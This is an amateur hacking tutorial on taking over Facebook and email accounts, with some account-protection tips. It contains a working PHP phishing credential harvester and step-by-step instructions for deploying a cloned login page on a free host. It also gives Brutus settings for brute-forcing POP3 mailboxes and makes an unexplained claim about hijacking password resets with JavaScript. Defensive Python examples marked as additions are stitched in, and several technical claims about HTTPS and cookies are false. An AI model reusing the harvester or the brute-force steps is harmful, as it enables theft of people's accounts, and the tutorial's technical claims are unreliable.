Facebook and email account hacking and how to secure it: by The G0dFather


These methods can be used against both email accounts and Facebook accounts.

First I am going to talk about some types of attacks hackers use to get into our Facebook accounts. Let's start:

Session Hijacking:
What is session hijacking?
A hacker uses session hijacking to capture your cookies, and there are a lot of tools out there that can help a hacker capture them. Once the cookies are captured, the hacker will know what you have been browsing, your login credentials and a lot more. All of us want to know how to protect ourselves from this type of attack. The first thing we should do is activate HTTPS and forget about HTTP.

What is HTTP and HTTPS:
HTTP (Hyper Text Transfer Protocol)
HTTPS (Hyper Text Transfer Protocol Secure)
HTTP runs on port 80, as we all know, and HTTPS runs on a more secure port, port 443.

What is the difference between the two? HTTP is not secure; HTTPS is 10 times more secure.

OK, let's talk practically. This is the exciting part:

There is this good guy and there is this bad guy.

The bad guy first talks to the good guy. They start a conversation, and then the bad guy says to the good guy, "I have to go."

So the good guy was using port 80 in this example.

So the bad guy does a scan and captures the good guy's cookies. After capturing the cookies, the bad guy has the login credentials, browsing history, etc.

Now the good guy switches to HTTPS. The bad guy tries to capture the cookies once again, but after some minutes he still cannot capture any.
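The story above comes down to which cookies the browser attaches to a plain-HTTP request. The following is an added example, not part of the original article: it audits Set-Cookie headers for the flags that keep a session cookie off port 80. The header values and cookie names are constructed.

```python
# Constructed Set-Cookie header values; the cookie names are hypothetical.
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/; HttpOnly",
    "auth=xyz789; Path=/; Secure; HttpOnly",
    "lang=en; Path=/",
]

def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, set of lowercase attribute names)."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs

def sent_on(scheme, headers):
    """Names of the cookies a browser would attach to a request using `scheme`."""
    sent = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        # A cookie marked Secure is withheld from plain-HTTP requests.
        if scheme == "https" or "secure" not in attrs:
            sent.append(name)
    return sent

def audit(headers):
    """Map each cookie name to a list of findings; an empty list means no finding."""
    report = {}
    for header in headers:
        name, attrs = parse_set_cookie(header)
        findings = []
        if "secure" not in attrs:
            findings.append("no Secure flag: sent in cleartext over http://")
        if "httponly" not in attrs:
            findings.append("no HttpOnly flag: readable by scripts in the page")
        report[name] = findings
    return report

if __name__ == "__main__":
    print("sent over http: ", sent_on("http", SAMPLE_HEADERS))
    print("sent over https:", sent_on("https", SAMPLE_HEADERS))
    for name, findings in audit(SAMPLE_HEADERS).items():
        print(name, findings or "ok")
```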

How should we protect our Facebook accounts from getting hacked or compromised:

First, click on Account, then Account Settings. On the right you will find something called Security. Click on it and you will see "Secure Browsing is currently disabled". Click on that and check "Browse Facebook on a secure connection (https) when possible".

I would also recommend using Login Approvals and setting up Recognized Devices; it is helpful and more secure for you guys.

I recommend hiding your email address: go to your profile, click Edit My Profile, then Contact Information. Under Emails you will find the email you log in with, and to its left a selector with Friends, Friends of Friends, Public and Only Me. Choose Only Me. I would also hide your phone number.

Phishing:
This method can be used against email accounts and Facebook accounts. We will keep this short, because new browsers can sometimes detect this type of attack. Let's start.

Phishing is the fake login page. Let's say the hacker sends you a link. You open it, it opens in a new tab or a new window, and although you previously logged in to your Facebook account it tells you that you need to log in again. You think, "This is weird, I have logged in before," but you enter your password anyway. Once you enter your username and password, your email/Facebook account is hacked. If you think for a little while you will realize that this is a fake page: a hacker is trying to trick you into putting your credentials (username and password) into it, and the credentials get saved in a text file called password. So how does the hacker do this? He gets the page's source code. Now open Notepad and change http://www.redirectwebsite.com to the address you want the victim redirected to after entering their username and password.

After typing the website you want to redirect them to, save it as, let's say, hello.php.

Of course copy this code:

 1: <?php
 2: header ('Location: http://www.redirectwebsite.com');
 3: $handle = fopen("pass.txt", "a");
 4: foreach($_POST as $variable => $value) {
 5:    fwrite($handle, $variable);
 6:    fwrite($handle, "=");
 7:    fwrite($handle, $value);
 8:    fwrite($handle, "rn");
 9: }
 10: fwrite($handle, "rn");
 11: fclose($handle);

 12: exit;
 13: ?>

And now we will have to create an empty file and save it as password.txt. Now open the source code, find the action tag, replace the address with hi.php and save the file.

Now we have created the three files we need. We have to upload them to a free host. After uploading, open the HTML file, enter fake credentials and go check password.txt.

If you see the username and password, it means that everything is done.
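The one thing a cloned login page cannot hide is where its form posts the password. The following is an added example, not part of the original article: it finds forms containing a password field and flags any that submit to a host outside a trusted list or over plain HTTP. The host name, page markup and trusted list are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a cloned login page whose form action was changed to hi.php.
CLONE_URL = "http://free-host.example/login.html"
CLONE_HTML = """<form method="post" action="hi.php">
<input type="text" name="email"><input type="password" name="pass">
</form>"""

class LoginFormFinder(HTMLParser):
    """Collect the action of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self._open = False          # currently inside a <form>
        self._action = ""           # action attribute of that form
        self._has_password = False
        self.login_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open, self._has_password = True, False
            self._action = a.get("action") or ""
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._open:
            if self._has_password:
                self.login_actions.append(self._action)
            self._open = False

def check_login_page(page_url, html, trusted_hosts):
    """Return findings for password forms on the page served from page_url."""
    finder = LoginFormFinder()
    finder.feed(html)
    finder.close()
    findings = []
    for action in finder.login_actions:
        target = urlparse(urljoin(page_url, action))   # empty action -> the page itself
        if target.hostname not in trusted_hosts:
            findings.append(f"password form posts to untrusted host {target.hostname}")
        if target.scheme != "https":
            findings.append(f"password form posts over {target.scheme}, not https")
    return findings

if __name__ == "__main__":
    print(check_login_page(CLONE_URL, CLONE_HTML, {"www.facebook.com"}))
```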

FireSheep:
This is a Firefox extension the hacker uses. If you are using an unprotected wireless network, the hacker can easily hack your account.

Brute Forcing The Email Address:
Today you are going to hear about the brute force attack hackers use. Every one of you has searched for Facebook/email hacking/cracking tools and found some, but of course most of them are fake. Let's start with a tool called Brutus. This tool can brute force or run a dictionary attack on an email address, so it can be very helpful. The only thing you have to do is type in the target, let's say pop3.yahoo.com, and set the type to POP3. Then set connections to 10 and the timeout to 60, make a wordlist.txt, type in the email that you want to hack, and set pass mode to brute force.

There is also a tool called POP3 Email Password Finder that can brute force accounts. It's a good tool. By the way, I have tried both of these tools on Windows XP; they work and they're very good.
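Password guessing against POP3 shows up on the mail server as a burst of failed logins for one account from one source. The following is an added example, not part of the original article: a sliding-window detector run over sample log lines. The log format, addresses and thresholds are assumptions made for the example, and the lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed lines in an assumed format: "<ISO time> pop3 <OK|FAIL> user=<u> ip=<ip>"
SAMPLE_LOG = [
    f"2024-01-01T10:00:{s:02d} pop3 FAIL user=alice ip=203.0.113.7"
    for s in range(0, 16, 2)            # 8 failures in 14 seconds
] + [
    "2024-01-01T10:05:00 pop3 FAIL user=bob ip=198.51.100.4",
    "2024-01-01T10:15:00 pop3 FAIL user=bob ip=198.51.100.4",   # a slow typo, not a burst
    "2024-01-01T10:15:30 pop3 OK user=bob ip=198.51.100.4",
]

def parse_line(line):
    """Return (timestamp, result, user, ip) from one log line."""
    ts, _proto, result, user, ip = line.split()
    return (datetime.fromisoformat(ts), result,
            user.split("=", 1)[1], ip.split("=", 1)[1])

def detect_bruteforce(lines, max_failures=5, window=timedelta(seconds=60)):
    """Return sorted (ip, user) pairs with more than max_failures failures inside window."""
    recent = defaultdict(deque)         # (ip, user) -> timestamps of recent failures
    flagged = set()
    for line in lines:
        when, result, user, ip = parse_line(line)
        if result != "FAIL":
            continue
        q = recent[(ip, user)]
        q.append(when)
        while when - q[0] > window:     # drop failures older than the window
            q.popleft()
        if len(q) > max_failures:
            flagged.add((ip, user))
    return sorted(flagged)

if __name__ == "__main__":
    for ip, user in detect_bruteforce(SAMPLE_LOG):
        print(f"possible brute force: {ip} -> {user}")
```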

JavaScript:
This one I have done with my own hands. On the reset password page you will find an alternative email field; you insert the JavaScript there and press Enter, and you can now put in any email address and the reset link will be sent to your email.

Keyloggers:
The hacker uses a keylogger to record your keystrokes; every key you type is recorded and sent to the hacker. The hacker has to send you a file with the keylogger inside, and he can hide it in anything he wants, even a music file or a picture. When you open this file it will either show an error or open without you seeing anything. Now when you sign in, the hacker can see your credentials (username and password). What will it look like? When you restart your computer a .bat file will appear, and it will start automatically every time you restart or turn on your computer. So how can we remove this?

If it does not appear as a .bat file, it will be running silently in the processes, so we will have to disable it by pressing CTRL+ALT+Delete, clicking on Processes and finding the name of the file.

For more security on Hotmail, try using a code to sign in, don't add alternative email addresses, and choose "sign me in with my trusted PC".

On Yahoo you will need to provide 2 fake answers; that will make you a lot more secure.

On Gmail, the same as these.

I hope you enjoyed this article. There are more methods to use; see you in my next article.

By
Fadi Rakha

The G0dFather

